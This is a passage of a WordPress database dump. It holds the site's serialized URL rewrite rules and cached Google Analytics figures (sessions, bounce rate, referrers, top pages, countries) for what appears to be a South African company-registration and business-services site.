\"et_pb_layout/[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:39:\"et_pb_layout/[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:59:\"et_pb_layout/[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:54:\"et_pb_layout/[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:54:\"et_pb_layout/[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:35:\"et_pb_layout/[^/]+/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:35:\"project/[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:45:\"project/[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:65:\"project/[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:60:\"project/[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:60:\"project/[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:41:\"project/[^/]+/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:24:\"project/([^/]+)/embed/?$\";s:40:\"index.php?project=$matches[1]&embed=true\";s:28:\"project/([^/]+)/trackback/?$\";s:34:\"index.php?project=$matches[1]&tb=1\";s:48:\"project/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:46:\"index.php?project=$matches[1]&feed=$matches[2]\";s:43:\"project/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:46:\"index.php?project=$matches[1]&feed=$matches[2]\";s:36:\"project/([^/]+)/page/?([0-9]{1,})/?$\";s:47:\"index.php?project=$matches[1]&paged=$matches[2]\";s:43:\"project/([^/]+)/comment-page-([0-9]{1,})/?$\";s:47:\"index.php?project=$matches[1]&cpage=$matches[2]\";s:33:\"project/([^/]+)/wc-api(/(.*))?/?$\";s:48:\"index.php?project=$matches[1]&wc-api=$matches[3]\";s:39:\"project/[^/]+/([^/]+)/wc-api(/(.*))?/?$\";s:51:\"index.php?attachment=$matches[1]&wc-api=$matches[3]\";s:50:\"project/[^/]+/attachment/([^/]+)/wc-api(/(.*))?/?$\";s:51:\"index.php?attachment=$matches[1]&wc-api=$matches[3]\";s:32:\"project/([^/]+)(?:/([0-9]+))?/?$\";s:46:\"index.php?project=$matches[1]&page=$matches[2]\";s:24:\"project/[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:34:\"project/[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:54:\"project/[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:49:\"project/[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:49:\"project/[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:30:\"project/[^/]+/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:57:\"project_category/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:55:\"index.php?project_category=$matches[1]&feed=$matches[2]\";s:52:\"project_category/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:55:\"index.php?project_category=$matches[1]&feed=$matches[2]\";s:33:\"project_category/([^/]+)/embed/?$\";s:49:\"index.php?project_category=$matches[1]&embed=true\";s:45:\"project_category/([^/]+)/page/?([0-9]{1,})/?$\";s:56:\"index.php?project_category=$matches[1]&paged=$matches[2]\";s:27:\"project_category/([^/]+)/?$\";s:38:\"index.php?project_category=$matches[1]\";s:52:\"project_tag/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?project_tag=$matches[1]&feed=$matches[2]\";s:47:\"project_tag/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?project_tag=$matches[1]&feed=$matches[2]\";s:28:\"project_tag/([^/]+)/embed/?$\";s:44:\"index.php?project_tag=$matches[1]&embed=true\";s:40:\"project_tag/([^/]+)/page/?([0-9]{1,})/?$\";s:51:\"index.php?project_tag=$matches[1]&paged=$matches[2]\";s:22:\"project_tag/([^/]+)/?$\";s:33:\"index.php?project_tag=$matches[1]\";s:55:\"product-category/(.+?)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?product_cat=$matches[1]&feed=$matches[2]\";s:50:\"product-category/(.+?)/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?product_cat=$matches[1]&feed=$matches[2]\";s:31:\"product-category/(.+?)/embed/?$\";s:44:\"index.php?product_cat=$matches[1]&embed=true\";s:43:\"product-category/(.+?)/page/?([0-9]{1,})/?$\";s:51:\"index.php?product_cat=$matches[1]&paged=$matches[2]\";s:25:\"product-category/(.+?)/?$\";s:33:\"index.php?product_cat=$matches[1]\";s:52:\"product-tag/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?product_tag=$matches[1]&feed=$matches[2]\";s:47:\"product-tag/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?product_tag=$matches[1]&feed=$matches[2]\";s:28:\"product-tag/([^/]+)/embed/?$\";s:44:\"index.php?product_tag=$matches[1]&embed=true\";s:40:\"product-tag/([^/]+)/page/?([0-9]{1,})/?$\";s:51:\"index.php?product_tag=$matches[1]&paged=$matches[2]\";s:22:\"product-tag/([^/]+)/?$\";s:33:\"index.php?product_tag=$matches[1]\";s:36:\"shop/.+?/[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:46:\"shop/.+?/[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:66:\"shop/.+?/[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:61:\"shop/.+?/[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:61:\"shop/.+?/[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:42:\"shop/.+?/[^/]+/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:27:\"shop/(.+?)/([^/]+)/embed/?$\";s:64:\"index.php?product_cat=$matches[1]&product=$matches[2]&embed=true\";s:31:\"shop/(.+?)/([^/]+)/trackback/?$\";s:58:\"index.php?product_cat=$matches[1]&product=$matches[2]&tb=1\";s:51:\"shop/(.+?)/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:70:\"index.php?product_cat=$matches[1]&product=$matches[2]&feed=$matches[3]\";s:46:\"shop/(.+?)/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:70:\"index.php?product_cat=$matches[1]&product=$matches[2]&feed=$matches[3]\";s:39:\"shop/(.+?)/([^/]+)/page/?([0-9]{1,})/?$\";s:71:\"index.php?product_cat=$matches[1]&product=$matches[2]&paged=$matches[3]\";s:46:\"shop/(.+?)/([^/]+)/comment-page-([0-9]{1,})/?$\";s:71:\"index.php?product_cat=$matches[1]&product=$matches[2]&cpage=$matches[3]\";s:36:\"shop/(.+?)/([^/]+)/wc-api(/(.*))?/?$\";s:72:\"index.php?product_cat=$matches[1]&product=$matches[2]&wc-api=$matches[4]\";s:40:\"shop/.+?/[^/]+/([^/]+)/wc-api(/(.*))?/?$\";s:51:\"index.php?attachment=$matches[1]&wc-api=$matches[3]\";s:51:\"shop/.+?/[^/]+/attachment/([^/]+)/wc-api(/(.*))?/?$\";s:51:\"index.php?attachment=$matches[1]&wc-api=$matches[3]\";s:35:\"shop/(.+?)/([^/]+)(?:/([0-9]+))?/?$\";s:70:\"index.php?product_cat=$matches[1]&product=$matches[2]&page=$matches[3]\";s:25:\"shop/.+?/[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:35:\"shop/.+?/[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:55:\"shop/.+?/[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:50:\"shop/.+?/[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:50:\"shop/.+?/[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:31:\"shop/.+?/[^/]+/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:42:\"cartflows_step/[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:52:\"cartflows_step/[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:72:\"cartflows_step/[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:67:\"cartflows_step/[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:67:\"cartflows_step/[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:48:\"cartflows_step/[^/]+/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:31:\"cartflows_step/([^/]+)/embed/?$\";s:47:\"index.php?cartflows_step=$matches[1]&embed=true\";s:35:\"cartflows_step/([^/]+)/trackback/?$\";s:41:\"index.php?cartflows_step=$matches[1]&tb=1\";s:43:\"cartflows_step/([^/]+)/page/?([0-9]{1,})/?$\";s:54:\"index.php?cartflows_step=$matches[1]&paged=$matches[2]\";s:50:\"cartflows_step/([^/]+)/comment-page-([0-9]{1,})/?$\";s:54:\"index.php?cartflows_step=$matches[1]&cpage=$matches[2]\";s:40:\"cartflows_step/([^/]+)/wc-api(/(.*))?/?$\";s:55:\"index.php?cartflows_step=$matches[1]&wc-api=$matches[3]\";s:46:\"cartflows_step/[^/]+/([^/]+)/wc-api(/(.*))?/?$\";s:51:\"index.php?attachment=$matches[1]&wc-api=$matches[3]\";s:57:\"cartflows_step/[^/]+/attachment/([^/]+)/wc-api(/(.*))?/?$\";s:51:\"index.php?attachment=$matches[1]&wc-api=$matches[3]\";s:39:\"cartflows_step/([^/]+)(?:/([0-9]+))?/?$\";s:53:\"index.php?cartflows_step=$matches[1]&page=$matches[2]\";s:31:\"cartflows_step/[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:41:\"cartflows_step/[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:61:\"cartflows_step/[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:56:\"cartflows_step/[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:56:\"cartflows_step/[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:37:\"cartflows_step/[^/]+/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:12:\"robots\\.txt$\";s:18:\"index.php?robots=1\";s:48:\".*wp-(atom|rdf|rss|rss2|feed|commentsrss2)\\.php$\";s:18:\"index.php?feed=old\";s:20:\".*wp-app\\.php(/.*)?$\";s:19:\"index.php?error=403\";s:18:\".*wp-register.php$\";s:23:\"index.php?register=true\";s:32:\"feed/(feed|rdf|rss|rss2|atom)/?$\";s:27:\"index.php?&feed=$matches[1]\";s:27:\"(feed|rdf|rss|rss2|atom)/?$\";s:27:\"index.php?&feed=$matches[1]\";s:8:\"embed/?$\";s:21:\"index.php?&embed=true\";s:20:\"page/?([0-9]{1,})/?$\";s:28:\"index.php?&paged=$matches[1]\";s:27:\"comment-page-([0-9]{1,})/?$\";s:38:\"index.php?&page_id=4&cpage=$matches[1]\";s:17:\"wc-api(/(.*))?/?$\";s:29:\"index.php?&wc-api=$matches[2]\";s:41:\"comments/feed/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?&feed=$matches[1]&withcomments=1\";s:36:\"comments/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?&feed=$matches[1]&withcomments=1\";s:17:\"comments/embed/?$\";s:21:\"index.php?&embed=true\";s:26:\"comments/wc-api(/(.*))?/?$\";s:29:\"index.php?&wc-api=$matches[2]\";s:44:\"search/(.+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:40:\"index.php?s=$matches[1]&feed=$matches[2]\";s:39:\"search/(.+)/(feed|rdf|rss|rss2|atom)/?$\";s:40:\"index.php?s=$matches[1]&feed=$matches[2]\";s:20:\"search/(.+)/embed/?$\";s:34:\"index.php?s=$matches[1]&embed=true\";s:32:\"search/(.+)/page/?([0-9]{1,})/?$\";s:41:\"index.php?s=$matches[1]&paged=$matches[2]\";s:29:\"search/(.+)/wc-api(/(.*))?/?$\";s:42:\"index.php?s=$matches[1]&wc-api=$matches[3]\";s:14:\"search/(.+)/?$\";s:23:\"index.php?s=$matches[1]\";s:47:\"author/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?author_name=$matches[1]&feed=$matches[2]\";s:42:\"author/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?author_name=$matches[1]&feed=$matches[2]\";s:23:\"author/([^/]+)/embed/?$\";s:44:\"index.php?author_name=$matches[1]&embed=true\";s:35:\"author/([^/]+)/page/?([0-9]{1,})/?$\";s:51:\"index.php?author_name=$matches[1]&paged=$matches[2]\";s:32:\"author/([^/]+)/wc-api(/(.*))?/?$\";s:52:\"index.php?author_name=$matches[1]&wc-api=$matches[3]\";s:17:\"author/([^/]+)/?$\";s:33:\"index.php?author_name=$matches[1]\";s:69:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:80:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&feed=$matches[4]\";s:64:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/(feed|rdf|rss|rss2|atom)/?$\";s:80:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&feed=$matches[4]\";s:45:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/embed/?$\";s:74:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&embed=true\";s:57:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/page/?([0-9]{1,})/?$\";s:81:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&paged=$matches[4]\";s:54:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/wc-api(/(.*))?/?$\";s:82:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&wc-api=$matches[5]\";s:39:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/?$\";s:63:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]\";s:56:\"([0-9]{4})/([0-9]{1,2})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:64:\"index.php?year=$matches[1]&monthnum=$matches[2]&feed=$matches[3]\";s:51:\"([0-9]{4})/([0-9]{1,2})/(feed|rdf|rss|rss2|atom)/?$\";s:64:\"index.php?year=$matches[1]&monthnum=$matches[2]&feed=$matches[3]\";s:32:\"([0-9]{4})/([0-9]{1,2})/embed/?$\";s:58:\"index.php?year=$matches[1]&monthnum=$matches[2]&embed=true\";s:44:\"([0-9]{4})/([0-9]{1,2})/page/?([0-9]{1,})/?$\";s:65:\"index.php?year=$matches[1]&monthnum=$matches[2]&paged=$matches[3]\";s:41:\"([0-9]{4})/([0-9]{1,2})/wc-api(/(.*))?/?$\";s:66:\"index.php?year=$matches[1]&monthnum=$matches[2]&wc-api=$matches[4]\";s:26:\"([0-9]{4})/([0-9]{1,2})/?$\";s:47:\"index.php?year=$matches[1]&monthnum=$matches[2]\";s:43:\"([0-9]{4})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?year=$matches[1]&feed=$matches[2]\";s:38:\"([0-9]{4})/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?year=$matches[1]&feed=$matches[2]\";s:19:\"([0-9]{4})/embed/?$\";s:37:\"index.php?year=$matches[1]&embed=true\";s:31:\"([0-9]{4})/page/?([0-9]{1,})/?$\";s:44:\"index.php?year=$matches[1]&paged=$matches[2]\";s:28:\"([0-9]{4})/wc-api(/(.*))?/?$\";s:45:\"index.php?year=$matches[1]&wc-api=$matches[3]\";s:13:\"([0-9]{4})/?$\";s:26:\"index.php?year=$matches[1]\";s:27:\".?.+?/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:37:\".?.+?/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:57:\".?.+?/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\".?.+?/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\".?.+?/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:33:\".?.+?/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:16:\"(.?.+?)/embed/?$\";s:41:\"index.php?pagename=$matches[1]&embed=true\";s:20:\"(.?.+?)/trackback/?$\";s:35:\"index.php?pagename=$matches[1]&tb=1\";s:40:\"(.?.+?)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:47:\"index.php?pagename=$matches[1]&feed=$matches[2]\";s:35:\"(.?.+?)/(feed|rdf|rss|rss2|atom)/?$\";s:47:\"index.php?pagename=$matches[1]&feed=$matches[2]\";s:28:\"(.?.+?)/page/?([0-9]{1,})/?$\";s:48:\"index.php?pagename=$matches[1]&paged=$matches[2]\";s:35:\"(.?.+?)/comment-page-([0-9]{1,})/?$\";s:48:\"index.php?pagename=$matches[1]&cpage=$matches[2]\";s:25:\"(.?.+?)/wc-api(/(.*))?/?$\";s:49:\"index.php?pagename=$matches[1]&wc-api=$matches[3]\";s:28:\"(.?.+?)/order-pay(/(.*))?/?$\";s:52:\"index.php?pagename=$matches[1]&order-pay=$matches[3]\";s:33:\"(.?.+?)/order-received(/(.*))?/?$\";s:57:\"index.php?pagename=$matches[1]&order-received=$matches[3]\";s:25:\"(.?.+?)/orders(/(.*))?/?$\";s:49:\"index.php?pagename=$matches[1]&orders=$matches[3]\";s:29:\"(.?.+?)/view-order(/(.*))?/?$\";s:53:\"index.php?pagename=$matches[1]&view-order=$matches[3]\";s:28:\"(.?.+?)/downloads(/(.*))?/?$\";s:52:\"index.php?pagename=$matches[1]&downloads=$matches[3]\";s:31:\"(.?.+?)/edit-account(/(.*))?/?$\";s:55:\"index.php?pagename=$matches[1]&edit-account=$matches[3]\";s:31:\"(.?.+?)/edit-address(/(.*))?/?$\";s:55:\"index.php?pagename=$matches[1]&edit-address=$matches[3]\";s:34:\"(.?.+?)/payment-methods(/(.*))?/?$\";s:58:\"index.php?pagename=$matches[1]&payment-methods=$matches[3]\";s:32:\"(.?.+?)/lost-password(/(.*))?/?$\";s:56:\"index.php?pagename=$matches[1]&lost-password=$matches[3]\";s:34:\"(.?.+?)/customer-logout(/(.*))?/?$\";s:58:\"index.php?pagename=$matches[1]&customer-logout=$matches[3]\";s:37:\"(.?.+?)/add-payment-method(/(.*))?/?$\";s:61:\"index.php?pagename=$matches[1]&add-payment-method=$matches[3]\";s:40:\"(.?.+?)/delete-payment-method(/(.*))?/?$\";s:64:\"index.php?pagename=$matches[1]&delete-payment-method=$matches[3]\";s:45:\"(.?.+?)/set-default-payment-method(/(.*))?/?$\";s:69:\"index.php?pagename=$matches[1]&set-default-payment-method=$matches[3]\";s:31:\".?.+?/([^/]+)/wc-api(/(.*))?/?$\";s:51:\"index.php?attachment=$matches[1]&wc-api=$matches[3]\";s:42:\".?.+?/attachment/([^/]+)/wc-api(/(.*))?/?$\";s:51:\"index.php?attachment=$matches[1]&wc-api=$matches[3]\";s:24:\"(.?.+?)(?:/([0-9]+))?/?$\";s:47:\"index.php?pagename=$matches[1]&page=$matches[2]\";s:27:\"[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:37:\"[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:57:\"[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\"[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\"[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:33:\"[^/]+/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:16:\"([^/]+)/embed/?$\";s:37:\"index.php?name=$matches[1]&embed=true\";s:20:\"([^/]+)/trackback/?$\";s:31:\"index.php?name=$matches[1]&tb=1\";s:40:\"([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?name=$matches[1]&feed=$matches[2]\";s:35:\"([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?name=$matches[1]&feed=$matches[2]\";s:28:\"([^/]+)/page/?([0-9]{1,})/?$\";s:44:\"index.php?name=$matches[1]&paged=$matches[2]\";s:35:\"([^/]+)/comment-page-([0-9]{1,})/?$\";s:44:\"index.php?name=$matches[1]&cpage=$matches[2]\";s:25:\"([^/]+)/wc-api(/(.*))?/?$\";s:45:\"index.php?name=$matches[1]&wc-api=$matches[3]\";s:31:\"[^/]+/([^/]+)/wc-api(/(.*))?/?$\";s:51:\"index.php?attachment=$matches[1]&wc-api=$matches[3]\";s:42:\"[^/]+/attachment/([^/]+)/wc-api(/(.*))?/?$\";s:51:\"index.php?attachment=$matches[1]&wc-api=$matches[3]\";s:24:\"([^/]+)(?:/([0-9]+))?/?$\";s:43:\"index.php?name=$matches[1]&page=$matches[2]\";s:16:\"[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:26:\"[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:46:\"[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:41:\"[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:41:\"[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:22:\"[^/]+/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";}','yes'),(6811,'yst_ga_sessions','a:5:{s:8:\"store_as\";s:8:\"datelist\";s:4:\"type\";s:8:\"sessions\";s:10:\"start_date\";i:1464393600;s:8:\"end_date\";i:1466985600;s:5:\"value\";a:31:{i:1464393600;i:3;i:1464480000;i:2;i:1464566400;i:1;i:1464652800;i:0;i:1464739200;i:0;i:1464825600;i:1;i:1464912000;i:0;i:1464998400;i:0;i:1465084800;i:0;i:1465171200;i:1;i:1465257600;i:0;i:1465344000;i:0;i:1465430400;i:0;i:1465516800;i:0;i:1465603200;i:1;i:1465689600;i:0;i:1465776000;i:0;i:1465862400;i:1;i:1465948800;i:2;i:1466035200;i:0;i:1466121600;i:7;i:1466208000;i:4;i:1466294400;i:4;i:1466380800;i:0;i:1466467200;i:9;i:1466553600;i:1;i:1466640000;i:1;i:1466726400;i:0;i:1466812800;i:0;i:1466899200;i:0;i:1466985600;i:0;}}','yes'),(6812,'yst_ga_bounceRate','a:5:{s:8:\"store_as\";s:8:\"datelist\";s:4:\"type\";s:10:\"bounceRate\";s:10:\"start_date\";i:1464393600;s:8:\"end_date\";i:1466985600;s:5:\"value\";a:31:{i:1464393600;i:100;i:1464480000;i:50;i:1464566400;i:100;i:1464652800;i:0;i:1464739200;i:0;i:1464825600;i:0;i:1464912000;i:0;i:1464998400;i:0;i:1465084800;i:0;i:1465171200;i:100;i:1465257600;i:0;i:1465344000;i:0;i:1465430400;i:0;i:1465516800;i:0;i:1465603200;i:100;i:1465689600;i:0;i:1465776000;i:0;i:1465862400;i:0;i:1465948800;i:100;i:1466035200;i:0;i:1466121600;i:14;i:1466208000;i:25;i:1466294400;i:25;i:1466380800;i:0;i:1466467200;i:11;i:1466553600;i:0;i:1466640000;i:100;i:1466726400;i:0;i:1466812800;i:0;i:1466899200;i:0;i:1466985600;i:0;}}','yes'),(6813,'yst_ga_source','a:5:{s:8:\"store_as\";s:5:\"table\";s:4:\"type\";s:6:\"source\";s:10:\"start_date\";i:1464393600;s:8:\"end_date\";i:1466985600;s:5:\"value\";a:5:{i:0;a:2:{s:4:\"name\";s:8:\"(direct)\";s:5:\"value\";i:29;}i:1;a:2:{s:4:\"name\";s:6:\"google\";s:5:\"value\";i:4;}i:2;a:2:{s:4:\"name\";s:36:\"forum.topic75787658.ghostvisitor.com\";s:5:\"value\";i:2;}i:3;a:2:{s:4:\"name\";s:12:\"magicdiet.gq\";s:5:\"value\";i:2;}i:4;a:2:{s:4:\"name\";s:36:\"forum.topic75648770.ghostvisitor.com\";s:5:\"value\";i:1;}}}','yes'),(6814,'yst_ga_top_pageviews','a:5:{s:8:\"store_as\";s:5:\"table\";s:4:\"type\";s:13:\"top_pageviews\";s:10:\"start_date\";i:1464393600;s:8:\"end_date\";i:1466985600;s:5:\"value\";a:16:{i:0;a:2:{s:4:\"name\";s:1:\"/\";s:5:\"value\";i:57;}i:1;a:2:{s:4:\"name\";s:16:\"/annual-returns/\";s:5:\"value\";i:4;}i:2;a:2:{s:4:\"name\";s:22:\"/company-registration/\";s:5:\"value\";i:4;}i:3;a:2:{s:4:\"name\";s:36:\"/employees-tax-pay-as-you-earn-paye/\";s:5:\"value\";i:3;}i:4;a:2:{s:4:\"name\";s:33:\"/product-category/business-tools/\";s:5:\"value\";i:3;}i:5;a:2:{s:4:\"name\";s:33:\"/shop/business-tools/free-report/\";s:5:\"value\";i:3;}i:6;a:2:{s:4:\"name\";s:21:\"/author/shop-manager/\";s:5:\"value\";i:2;}i:7;a:2:{s:4:\"name\";s:17:\"/deregistrations/\";s:5:\"value\";i:2;}i:8;a:2:{s:4:\"name\";s:14:\"/restorations/\";s:5:\"value\";i:2;}i:9;a:2:{s:4:\"name\";s:56:\"/shop/maintaning-your-company/change-in-company-address/\";s:5:\"value\";i:2;}i:10;a:2:{s:4:\"name\";s:47:\"/shop/tax-registration/income-tax-registration/\";s:5:\"value\";i:2;}i:11;a:2:{s:4:\"name\";s:20:\"/close-corporations/\";s:5:\"value\";i:1;}i:12;a:2:{s:4:\"name\";s:12:\"/contact-us/\";s:5:\"value\";i:1;}i:13;a:2:{s:4:\"name\";s:37:\"/shop/bee-requirements/bee-affidavit/\";s:5:\"value\";i:1;}i:14;a:2:{s:4:\"name\";s:54:\"/shop/company-registration/personal-liability-company/\";s:5:\"value\";i:1;}i:15;a:2:{s:4:\"name\";s:69:\"/shop/company-registration/private-company-with-a-standard-moi-basic/\";s:5:\"value\";i:1;}}}','yes'),(6815,'yst_ga_top_countries','a:5:{s:8:\"store_as\";s:5:\"table\";s:4:\"type\";s:13:\"top_countries\";s:10:\"start_date\";i:1464393600;s:8:\"end_date\";i:1466985600;s:5:\"value\";a:7:{i:0;a:2:{s:4:\"name\";s:12:\"South Africa\";s:5:\"value\";i:11;}i:1;a:2:{s:4:\"name\";s:9:\"(not set)\";s:5:\"value\";i:10;}i:2;a:2:{s:4:\"name\";s:13:\"United States\";s:5:\"value\";i:9;}i:3;a:2:{s:4:\"name\";s:6:\"Russia\";s:5:\"value\";i:3;}i:4;a:2:{s:4:\"name\";s:7:\"Germany\";s:5:\"value\";i:2;}i:5;a:2:{s:4:\"name\";s:14:\"United Kingdom\";s:5:\"value\";i:2;}i:6;a:2:{s:4:\"name\";s:7:\"Ukraine\";s:5:\"value\";i:1;}}}','yes'),(6924,'CF5714b9a9ee4ba','a:20:{s:13:\"_last_updated\";s:31:\"Mon, 18 Apr 2016 11:08:22 